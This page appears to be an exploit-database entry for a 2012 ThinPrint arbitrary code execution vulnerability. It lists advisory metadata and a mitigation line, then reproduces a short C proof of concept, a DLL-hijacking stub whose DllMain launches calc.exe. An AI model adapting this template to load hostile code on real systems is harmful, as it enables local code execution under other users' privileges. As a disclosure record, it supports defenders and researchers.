header-logo
Suggest Exploit
vendor:
ThinPrint
by:
SecurityFocus
9,3
CVSS
HIGH
Arbitrary Code Execution
94
CWE
Product Name: ThinPrint
Affected Version From: N/A
Affected Version To: N/A
Patch Exists: YES
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: Windows
2012

ThinPrint Arbitrary Code Execution Vulnerability

ThinPrint is prone to a vulnerability that lets attackers execute arbitrary code. Exploiting this issue allows local attackers to execute arbitrary code with the privileges of the user running the affected application. An example exploit code is provided in the description.

Mitigation:

Users should ensure that they are running the latest version of ThinPrint and apply all necessary patches.
Source

Exploit-DB raw data:

// source: https://www.securityfocus.com/bid/55421/info

ThinPrint is prone to a vulnerability that lets attackers execute arbitrary code.

Exploiting this issue allows local attackers to execute arbitrary code with the privileges of the user running the affected application. 

#include <windows.h> 

	int hijack_poc () 
	{ 
	  WinExec ( "calc.exe" , SW_NORMAL );
	  return 0 ; 
	} 
	  
	BOOL WINAPI DllMain 
		 (	HINSTANCE hinstDLL , 
			DWORD dwReason ,
			LPVOID lpvReserved ) 
	{ 
	  hijack_poc () ;
	  return 0 ;
	}

Navigation

Suggest Exploit

Services By CQR